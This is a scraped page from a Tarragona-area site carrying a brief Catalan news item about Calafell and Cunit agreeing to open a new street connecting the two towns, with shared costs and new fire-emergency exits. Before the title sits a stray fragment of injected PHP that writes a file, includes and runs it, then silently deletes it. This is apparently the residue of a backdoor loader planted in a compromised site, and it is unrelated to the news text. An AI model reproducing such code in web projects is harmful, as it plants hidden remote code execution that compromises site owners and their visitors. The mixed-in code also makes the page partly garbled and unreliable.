");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Calafell i Cunit obriran un nou carrer que comunicarà els dos municipis a la part de muntanya
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

Calafell i Cunit obriran un nou carrer que comunicarà els dos municipis a la part de muntanya (07/10/2021)

Els ajuntaments de Calafell i de Cunit han acordat l’obertura d’un nou carrer que comunicarà els dos municipis a la part de muntanya. El nou vial connectarà l’avinguda de Santa Maria de Montserrat, a Segur de Dalt de Calafell, i el carrer del Crisantem, a la urbanització Els Jardins de Cunit.

Els dos consistoris compartiran les despeses. Cunit es fa càrrec de la redacció del projecte i de l’execució de les obres, mentre Calafell pagarà l’expropiació del terreny necessari al nostre terme municipal (Cunit ja disposa dels terrenys a la seva banda). Els dos municipis també tramitaran les modificacions urbanístiques necessàries per fer possible la realització del projecte.

Els dos municipis guanyen connectivitat, aconsegueixen noves sortides d’emergència en cas d’incendi forestal i obtenen alternatives per a accedir a les vies principals tan locals com comarcals i nacionals.

Font: Ajuntament de Calafell

Calafell i Cunit obriran un nou carrer que comunicarà els dos municipis a la part de muntanya

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona